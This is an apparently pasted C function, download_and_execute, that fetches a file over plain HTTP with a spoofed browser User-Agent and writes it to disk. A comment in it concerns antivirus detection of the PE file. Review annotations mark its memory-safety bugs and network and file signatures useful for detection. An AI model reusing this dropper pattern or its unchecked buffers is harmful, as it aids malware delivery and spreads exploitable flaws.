
Untitled

a guest
Apr 21st, 2019
  1. // Fetches `url` over plain HTTP (port 80) and writes the response body to `path_to_write`.
     //
     // Despite the name, nothing in this body executes the written file; any launch step
     // would have to happen in the caller (not shown here).
     //
     // Parameters:
     //   path_to_write - destination path, opened with fopen(..., "wb").
     //   url           - expected to contain "://" followed by host and a '/'-prefixed path.
     //   filesize      - caller-supplied expected body size; it sizes the receive buffer
     //                   and is also the number of bytes written to disk.
     // Returns 1 on success and -1 on every failure path.
     //
     // socket_init_and_connect, sendall and close_socket_connection are defined elsewhere.
     //
     // NOTE(review): the routine trusts `url`, `filesize` and the server response without
     // bounds checks; the individual memory-safety problems are marked inline below.
  2. int download_and_execute(const char * path_to_write, const char * url, long filesize) {
  3.  
  4. char host[512];
  5. char host_path[512];
  6.  
     // NOTE(review): strstr() returns NULL when `url` has no "://", so `t + 3` is then an
     // invalid pointer. The strcpy() is unbounded: a URL longer than 511 bytes after the
     // scheme overflows `host` on the stack.
  7. char* t = strstr(url, "://");
  8. strcpy(host, t + 3);
  9.  
  10.  
      // Split "host/path": the path (including its leading '/') is copied out first,
      // then the host string is cut at that '/'. A URL with no path component is rejected.
  11. char* tt = strstr(host, "/");
  12. if (!tt) return -1;
  13. else {
  14. strcpy(host_path, tt);
  15. }
  16.  
      // Copies an empty string to `tt`, i.e. writes a NUL terminator over the '/',
      // leaving `host` holding only the host name.
  17. strcpy(tt, "\x00");
  18.  
  19. #ifdef _DEBUG
  20. printf("HOST:%s\n", host);
  21. printf("PATH:%s\n", host_path);
  22. printf("Init...\n");
  23. #endif
      // Port is fixed at 80 and the request below is cleartext HTTP, so the payload has
      // no transport integrity or server authentication, and the transfer is fully
      // visible to network monitoring.
      // NOTE(review): identifiers starting with a double underscore are reserved in C.
  24. int __port = 80;
  25.  
      // The "Phase-N" and later printf calls are outside the _DEBUG guard, so they are
      // compiled into every build; the literals are stable strings in the binary.
  26. printf("Phase-2\n");
  27.  
  28. SOCKET host_server = INVALID_SOCKET;
  29. printf("phase-3\n");
  30. if (!socket_init_and_connect(&host_server, host, __port)) {
  31. printf("Error socket_init_and_connect\n");
  32. return -1;
  33. }
  34.  
  35. printf("Phase-4\n");
  36.  
      // NOTE(review): on Winsock SOCKET is an integer handle type, so INVALID_SOCKET is
      // the meaningful comparison; the NULL comparison mixes pointer and handle semantics.
  37. if (host_server == INVALID_SOCKET || host_server == NULL) {
  38. printf("Invalid socket..");
  39. return -1;
  40. }
  41.  
  42. printf("Phase-5\n");
  43. // Form HTTP-request message.
  44. // use browser-like UA to have less complications
      //
      // The request has a fixed shape: HTTP/1.0 request line, an upper-case "HOST:"
      // header, "Cache-Control: max-age=0", and one hard-coded Chrome 27 User-Agent.
      // That combination is constant across runs and usable as a network signature.
  45.  
  46. char tmp_buff[512], http_request_buff[1024];
  47.  
      // NOTE(review): `host_path` and `host` can each be up to 511 bytes, so either
      // sprintf() can overflow the 512-byte `tmp_buff` once the fixed text is added,
      // and the strcat() chain is not checked against the 1024-byte request buffer.
  48. sprintf(tmp_buff, "GET %s HTTP/1.0\r\n", host_path);
  49. strcpy(http_request_buff, tmp_buff);
  50.  
  51. sprintf(tmp_buff, "HOST: %s\r\n", host);
  52. strcat(http_request_buff, tmp_buff);
  53. strcat(http_request_buff, "Cache-Control: max-age=0\r\n");
  54. strcat(http_request_buff, "User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.94 Safari/537.36\r\n" );
  55.  
      // Empty line terminates the header section.
  56. strcat(http_request_buff, "\r\n");
  57.  
  58. printf("HTTP-REQUEST-BUFF: \n%s\n", http_request_buff);
  59.  
  60. if (!sendall(host_server, http_request_buff, strlen(http_request_buff) * sizeof(char))) {
  61. printf("Error sending request\n");
  62. close_socket_connection(host_server);
  63. return -1;
  64. }
  65.  
      // Receive buffer is sized from the caller's `filesize` plus 512 bytes of slack
      // for the response headers.
      // NOTE(review): a negative `filesize` converts to a very large size_t, and the
      // malloc() result is used by memset() without a NULL check.
  66. size_t http_response_size = (size_t)(filesize + 512);
  67. char * http_response = malloc(http_response_size);
  68. memset(http_response, 0, http_response_size);
  69. printf("Reading response");
  70. int total_recv = 0;
      // Reads the response one byte per recv() call until recv() returns <= 0.
  71. while (1) {
      // NOTE(review): the realloc() return value is discarded. If the block is moved,
      // `http_response` is left dangling; if it is not, the buffer grew by 64 bytes
      // while the tracked size below grows by 512, so later writes can run past it.
  72. if (total_recv >= (int)(http_response_size) ) {
  73. printf("Reallocating\n");
  74. realloc(http_response, http_response_size + 64);
  75. http_response_size += 512;
  76. }
      // NOTE(review): `r` is added to `total_recv` before it is checked, so an error
      // return of -1 decrements the count, and the one-byte memset() then lands at
      // that adjusted offset (index -1 if nothing was received). When `total_recv`
      // reaches `http_response_size`, the same memset() writes one byte past the end.
  77. int r = recv(host_server, http_response+total_recv, 1, 0);
  78. total_recv += r;
  79. memset(http_response + total_recv, 0, 1);
  80. if (r <= 0) {
  81. printf("Finished??..");
  82. break;
  83. }
  84.  
  85. }
  86.  
      // "%s" stops at the first NUL byte, so a binary body is printed only partially.
  87. printf("HTTP-REPONSE:\n%s\n", http_response);
  88. printf("Finished receiving...\n" );
  89. // http_response now holds the http response data by the server
      // NOTE(review): this status check is ineffective. strstr() returns a pointer at
      // or after `http_response`, so `http_response - http_ok` is never positive and
      // the `> 10` test cannot succeed; a response without "200 OK" is not rejected
      // either. Any server reply therefore continues to the write step.
  90. char* http_ok = strstr(http_response, "200 OK");
  91. if ((http_ok != NULL) && (http_response - http_ok) > 10) {
  92. free(http_response);
  93. close_socket_connection(host_server);
  94. return -1;
  95. }
  96.  
      // NOTE(review): a string literal is passed here instead of `host_server`, so the
      // socket does not appear to be closed on this path (confirm against the helper).
  97. close_socket_connection("");
      // Locate the blank line that separates headers from body.
  98. char* http_header_end = strstr(http_response, "\r\n\r\n");
  99. if (http_header_end == NULL) {
  100. free(http_response);
  101. return -1;
  102. }
  103.  
       // Body starts just past the 4-byte "\r\n\r\n" separator.
  104. char* exe_file_contents = http_header_end + 4;
  105.  
  106. // [!] Direct write to disc of a (valid) PE file might trigger AVs
       //
       // The payload reaches disk at `path_to_write` in a single write, which makes
       // this file creation the natural point for on-access scanning and file-event
       // telemetry.
       // NOTE(review): `http_response` is not freed on the fopen() failure path.
  107. FILE* file = fopen(path_to_write, "wb");
  108. if (!file) {
  109. return -1;
  110. }
  111.  
       // NOTE(review): writes `filesize` bytes regardless of how many bytes were
       // actually received. If the headers exceed the 512-byte slack or the body is
       // shorter than `filesize`, this reads beyond the received data and possibly
       // beyond the allocation. The fwrite() result is not checked, and
       // `http_response` is never freed on the success path.
  112. fwrite((void*)exe_file_contents, filesize, 1, file);
  113. fclose(file);
  114.  
  115.  
  116. return 1;
  117. }